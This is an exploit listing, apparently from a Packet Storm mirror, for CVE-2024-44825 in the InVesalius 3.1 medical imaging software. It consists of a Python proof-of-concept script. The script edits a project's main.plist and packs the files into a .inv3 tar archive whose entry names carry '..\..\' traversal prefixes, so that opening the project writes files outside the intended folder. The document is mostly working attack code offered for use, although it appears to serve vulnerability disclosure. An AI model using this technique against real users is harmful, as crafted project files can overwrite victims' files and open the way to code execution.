Share
## https://sploitus.com/exploit?id=PACKETSTORM:181738
# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal   
# Discovered By: Riccardo Degli Esposti (partywave)  
# Exploit Author: Riccardo Degli Esposti (partywave)  
# Vendor Homepage: https://invesalius.github.io/  
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius  
# Version: from 3.1.99995  
# Tested on: Windows  
# CVE-ID: CVE-2024-44825  
  
import tarfile  
import os  
import zipfile  
  
# Disclaimer:  
# Tested on Windows  
# edit every [CHANGEME] before run this script  
  
# Step 0: Setup local paths  
# Adapt your paths  
zip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'  
extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'  
  
output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'  
  
  
main_plist_path = os.path.join(extracted_folder, 'main.plist')  
  
# Ensure the extraction directory exists  
os.makedirs(extracted_folder, exist_ok=True)  
  
# Step 1: Extract the ZIP file  
with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:  
zip_ref.extractall(extracted_folder)  
  
with open(main_plist_path, 'r') as file:  
main_plist_content = file.read()  
  
# POC of loading new XML  
main_plist_content = main_plist_content.replace(  
'<string>ProMED CT 0051</string>',   
'<string>This is a confirmation modifying the XML</string>'  
)  
  
with open(main_plist_path, 'w') as file:  
file.write(main_plist_content)  
  
# Step 3: Create the tar archive  
# Adapt where you want write  
def rename(tarinfo):  
tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name  
return tarinfo  
  
with tarfile.open(output_tar, "w:xz") as tar:  
for root, _, files in os.walk(extracted_folder):  
for file in files:  
full_path = os.path.join(root, file)  
arcname = os.path.relpath(full_path, extracted_folder)  
tar.add(full_path, arcname=arcname, filter=rename)  
  
output_tar